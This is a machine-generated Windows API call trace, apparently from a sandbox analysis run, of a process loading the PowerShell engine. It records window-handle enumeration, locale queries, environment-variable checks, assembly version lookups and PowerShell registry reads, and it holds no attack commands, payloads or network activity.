	[0727.113] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xed8
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xe90
	[0727.113] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xea8
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfa8
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfbc
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfb8
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfb4
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfb0
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfac
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfc0
	[0727.114] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xfd0
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf88
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf84
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xf80
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xde0
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xddc
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xdd8
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd34
	[0727.115] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd10
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xd0c
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc9c
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc74
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc1c
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xc08
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xabc
	[0727.116] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x24c
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbb0
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xbfc
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb10
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x374
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x368
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb28
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xae8
	[0727.117] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb14
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x95c
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa8c
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x46c
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb3c
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa90
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xad0
	[0727.118] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa9c
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xaa0
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb1c
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7e0
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa74
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x694
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xa28
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x9b0
	[0727.119] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x8d8
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x940
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x93c
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4ec
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x150
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x720
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x3c4
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7d4
	[0727.120] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6c8
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb54
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb54
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6bc
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb5c
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x838
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x818
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5b8
	[0727.121] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x494
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1ec
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x440
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7e8
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x730
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x2c8
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x31c
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x330
	[0727.122] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x128
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c8
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6f8
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x358
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x73c
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xb0
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x250
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x240
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x790
	[0727.123] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x61c
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x568
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x538
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x540
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x79c
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4e0
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x460
	[0727.124] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x778
	[0727.128] WerSetFlags () returned 0x0
	[0728.606] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0728.607] CoTaskMemFree (pv=0x0) 
	[0728.608] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df20 | out: pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df20) returned 1
	[0728.608] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x2d53f38, pcchLanguagesBuffer=0x24df20 | out: pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x2d53f38, pcchLanguagesBuffer=0x24df20) returned 1
	[0728.614] CoTaskMemAlloc (cb=0x24) returned 0x175380
	[0728.614] GetUserDefaultLocaleName (in: lpLocaleName=0x175380, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0728.614] CoTaskMemFree (pv=0x175380) 
	[0728.638] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0728.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.638] CoTaskMemFree (pv=0x181480) 
	[0728.640] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0728.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.640] CoTaskMemFree (pv=0x181480) 
	[0728.642] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0728.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.642] CoTaskMemFree (pv=0x181480) 
	[0728.646] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24de10 | out: lpdwHandle=0x24de10) returned 0x94c
	[0728.648] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d577c8 | out: lpData=0x2d577c8) returned 1
	[0728.649] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dd88, puLen=0x24dd80 | out: lplpBuffer=0x24dd88*=0x2d57864, puLen=0x24dd80) returned 1
	[0728.649] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57940, puLen=0x24dcf0) returned 1
	[0728.649] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0728.649] CoTaskMemAlloc (cb=0x2e) returned 0x183f50
	[0728.649] lstrcpyW (in: lpString1=0x183f50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0728.649] CoTaskMemFree (pv=0x183f50) 
	[0728.649] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57994, puLen=0x24dcf0) returned 1
	[0728.649] lstrlenW (lpString="System.Management.Automation") returned 28
	[0728.649] CoTaskMemAlloc (cb=0x3c) returned 0x180750
	[0728.649] lstrcpyW (in: lpString1=0x180750, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0728.649] CoTaskMemFree (pv=0x180750) 
	[0728.649] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d579f0, puLen=0x24dcf0) returned 1
	[0728.649] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0728.649] CoTaskMemAlloc (cb=0x20) returned 0x17d610
	[0728.649] lstrcpyW (in: lpString1=0x17d610, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0728.649] CoTaskMemFree (pv=0x17d610) 
	[0728.650] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57a30, puLen=0x24dcf0) returned 1
	[0728.650] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0728.650] CoTaskMemAlloc (cb=0x44) returned 0x180750
	[0728.650] lstrcpyW (in: lpString1=0x180750, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0728.650] CoTaskMemFree (pv=0x180750) 
	[0728.650] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57a98, puLen=0x24dcf0) returned 1
	[0728.650] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0728.650] CoTaskMemAlloc (cb=0x76) returned 0x126db0
	[0728.650] lstrcpyW (in: lpString1=0x126db0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0728.650] CoTaskMemFree (pv=0x126db0) 
	[0728.650] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57b34, puLen=0x24dcf0) returned 1
	[0728.650] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0728.650] CoTaskMemAlloc (cb=0x44) returned 0x180750
	[0728.650] lstrcpyW (in: lpString1=0x180750, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0728.650] CoTaskMemFree (pv=0x180750) 
	[0728.650] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57b98, puLen=0x24dcf0) returned 1
	[0728.650] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0728.650] CoTaskMemAlloc (cb=0x58) returned 0x14cb10
	[0728.650] lstrcpyW (in: lpString1=0x14cb10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0728.650] CoTaskMemFree (pv=0x14cb10) 
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d57c14, puLen=0x24dcf0) returned 1
	[0728.651] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0728.651] CoTaskMemAlloc (cb=0x20) returned 0x17d610
	[0728.651] lstrcpyW (in: lpString1=0x17d610, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0728.651] CoTaskMemFree (pv=0x17d610) 
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2d578bc, puLen=0x24dcf0) returned 1
	[0728.651] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0728.651] CoTaskMemAlloc (cb=0x66) returned 0x17c780
	[0728.651] lstrcpyW (in: lpString1=0x17c780, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0728.651] CoTaskMemFree (pv=0x17c780) 
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dcc8, puLen=0x24dcc0 | out: lplpBuffer=0x24dcc8*=0x2d57864, puLen=0x24dcc0) returned 1
	[0728.651] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0728.651] VerLanguageNameW (in: wLang=0x0, szLang=0x129840, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0728.651] CoTaskMemFree (pv=0x129840) 
	[0728.651] VerQueryValueW (in: pBlock=0x2d577c8, lpSubBlock="\\", lplpBuffer=0x24dd18, puLen=0x24dd10 | out: lplpBuffer=0x24dd18*=0x2d577f0, puLen=0x24dd10) returned 1
	[0728.653] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0728.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.653] CoTaskMemFree (pv=0x181480) 
	[0728.654] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0728.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.655] CoTaskMemFree (pv=0x181480) 
	[0728.664] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbe8 | out: phkResult=0x24dbe8*=0x2fc) returned 0x0
	[0728.665] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbd8 | out: phkResult=0x24dbd8*=0x300) returned 0x0
	[0728.665] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dc68 | out: phkResult=0x24dc68*=0x304) returned 0x0
	[0728.667] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dbac, lpData=0x0, lpcbData=0x24dba8*=0x0 | out: lpType=0x24dbac*=0x1, lpData=0x0, lpcbData=0x24dba8*=0x56) returned 0x0
	[0728.668] CoTaskMemAlloc (cb=0x5a) returned 0x17c710
	[0728.668] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24db7c, lpData=0x17c710, lpcbData=0x24db78*=0x56 | out: lpType=0x24db7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24db78*=0x56) returned 0x0
	[0728.668] CoTaskMemFree (pv=0x17c710) 
	[0728.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.772] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0730.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.772] CoTaskMemFree (pv=0x181480) 
	[0736.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0736.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0739.804] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0739.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.804] CoTaskMemFree (pv=0x181590) 
	[0739.804] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0739.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.804] CoTaskMemFree (pv=0x181590) 
	[0741.287] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0741.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.287] CoTaskMemFree (pv=0x181590) 
	[0741.288] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0741.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.288] CoTaskMemFree (pv=0x181590) 
	[0741.288] CoTaskMemAlloc (cb=0x104) returned 0x181590
	[0741.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.288] CoTaskMemFree (pv=0x181590) 
